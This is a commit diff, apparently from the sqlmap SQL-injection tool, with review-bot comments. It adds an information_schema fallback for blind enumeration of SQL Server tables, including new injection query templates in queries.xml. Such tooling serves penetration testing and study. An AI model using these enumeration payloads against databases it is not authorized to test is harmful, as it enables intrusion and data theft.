

Commit fecdce5

committed
implemented --tables over information_schema for MSSQL as a failover option for BOOLEAN technique too
1 parent ff52931 commit fecdce5

2 files changed

Lines changed: 13 additions & 8 deletions


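--- a/plugins/dbms/mssqlserver/enumeration.py
+++ b/plugins/dbms/mssqlserver/enumeration.py
@@ -115,20 +115,25 @@ def getTables(self):
             infoMsg += "database '%s'" % db
             logger.info(infoMsg)
 
-            query = rootQuery.blind.count % db
-            count = inject.getValue(query, inband=False, error=False, charsetType=2)
+            for query in (rootQuery.blind.count, rootQuery.blind.count2):
+                _ = query % db
+                count = inject.getValue(_, inband=False, error=False, charsetType=2)
+                if not isNoneValue(count):
+                    break
 
             if not isNumPosStrValue(count):
-                warnMsg = "unable to retrieve the number of "
-                warnMsg += "tables for database '%s'" % db
-                logger.warn(warnMsg)
+                if count != "0":
+                    warnMsg = "unable to retrieve the number of "
+                    warnMsg += "tables for database '%s'" % db
+                    logger.warn(warnMsg)
                 continue
 
             tables = []
 
             for index in xrange(int(count)):
-                query = rootQuery.blind.query.replace("%s", db) % index
-                table = inject.getValue(query, inband=False, error=False)
+                _ = (rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2).replace("%s", db) % index
+
+                table = inject.getValue(_, inband=False, error=False)
                 kb.hintValue = table
                 table = safeSQLIdentificatorNaming(table, True)
                 tables.append(table)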
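Review bot: The fallback to `rootQuery.blind.count2` only fires when the sysobjects count comes back as None, so a `"0"` from the first query is taken as final and the `information_schema` path is never tried; if that is deliberate, a comment on the new `for query in (...)` loop should say so, e.g. `# any answer from the first count (even "0") is final; count2 is only tried when the sysobjects query yields nothing`. The later `rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2` depends on the loop variable `query` leaking out of that `for`, which is easy to break on a later edit; iterating explicit (count, query) pairs makes the coupling visible and drops the string comparison. Note also that in `count2`/`query2` the database name lands inside a quoted literal (`table_catalog='%s'`) rather than an identifier position, so a `'` in `db` would break the fallback queries unless it is escaped upstream, which is outside this hunk. getTables starts before and ends after this hunk.
```python
            for count_query, table_query in ((rootQuery.blind.count, rootQuery.blind.query), (rootQuery.blind.count2, rootQuery.blind.query2)):
                count = inject.getValue(count_query % db, inband=False, error=False, charsetType=2)
                if not isNoneValue(count):
                    break

            # … unchanged: zero/None count handling, tables = [] …

            for index in xrange(int(count)):
                _ = table_query.replace("%s", db) % index
                # … unchanged: getValue, kb.hintValue, naming, append …
```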

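--- a/xml/queries.xml
+++ b/xml/queries.xml
@@ -185,7 +185,7 @@
         </dbs>
         <tables>
             <inband query="SELECT %s..sysusers.name+'.'+%s..sysobjects.name FROM %s..sysobjects INNER JOIN %s..sysusers ON %s..sysobjects.uid = %s..sysusers.uid WHERE xtype IN ('u', 'v')" query2="SELECT table_schema+'.'+table_name FROM information_schema.tables WHERE table_catalog='%s'"/>
-            <blind query="SELECT TOP 1 %s..sysusers.name+'.'+%s..sysobjects.name FROM %s..sysobjects INNER JOIN %s..sysusers ON %s..sysobjects.uid = %s..sysusers.uid WHERE xtype IN ('u', 'v') AND %s..sysusers.name+'.'+%s..sysobjects.name NOT IN (SELECT TOP %d %s..sysusers.name+'.'+%s..sysobjects.name FROM %s..sysobjects INNER JOIN %s..sysusers ON %s..sysobjects.uid = %s..sysusers.uid WHERE xtype IN ('u', 'v') ORDER BY %s..sysusers.name+'.'+%s..sysobjects.name) ORDER BY %s..sysusers.name+'.'+%s..sysobjects.name" count="SELECT LTRIM(STR(COUNT(name))) FROM %s..sysobjects WHERE xtype IN ('u','v')"/>
+            <blind query="SELECT TOP 1 %s..sysusers.name+'.'+%s..sysobjects.name FROM %s..sysobjects INNER JOIN %s..sysusers ON %s..sysobjects.uid = %s..sysusers.uid WHERE xtype IN ('u', 'v') AND %s..sysusers.name+'.'+%s..sysobjects.name NOT IN (SELECT TOP %d %s..sysusers.name+'.'+%s..sysobjects.name FROM %s..sysobjects INNER JOIN %s..sysusers ON %s..sysobjects.uid = %s..sysusers.uid WHERE xtype IN ('u', 'v') ORDER BY %s..sysusers.name+'.'+%s..sysobjects.name) ORDER BY %s..sysusers.name+'.'+%s..sysobjects.name" count="SELECT LTRIM(STR(COUNT(name))) FROM %s..sysobjects WHERE xtype IN ('u','v')" query2="SELECT TOP 1 table_schema+'.'+table_name FROM information_schema.tables WHERE table_catalog='%s' AND table_schema+'.'+table_name NOT IN (SELECT TOP %d table_schema+'.'+table_name FROM information_schema.tables WHERE table_catalog='%s' ORDER BY table_schema+'.'+table_name) ORDER BY table_schema+'.'+table_name" count2="SELECT LTRIM(STR(COUNT(table_name))) FROM information_schema.tables WHERE table_catalog='%s'"/>
         </tables>
         <columns>
             <inband query="SELECT %s..syscolumns.name,TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'" condition="[DB]..syscolumns.name"/>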
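Review bot: The new `query2`/`count2` on the `<blind>` element read `information_schema.tables WHERE table_catalog='%s'` with no database prefix; as far as I recall, SQL Server's INFORMATION_SCHEMA views are scoped to the current database (table_catalog always equals it), so this fallback only lists tables when `%s` is the database the injected session is already in, the same limitation the existing inband `query2` carries. If other databases are meant to be covered, qualifying the view, `FROM %s.information_schema.tables WHERE table_catalog='%s'`, in all three places would do it; the Python side fills every `%s` with `db` via `replace("%s", db)`, so the extra placeholder should still line up, but that is worth confirming. Unlike the sysobjects forms there is no `table_type` filter, which looks fine because the view only holds BASE TABLE and VIEW rows, matching `xtype IN ('u','v')`; a one-line XML comment recording that equivalence next to the element would save the next reader the check.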
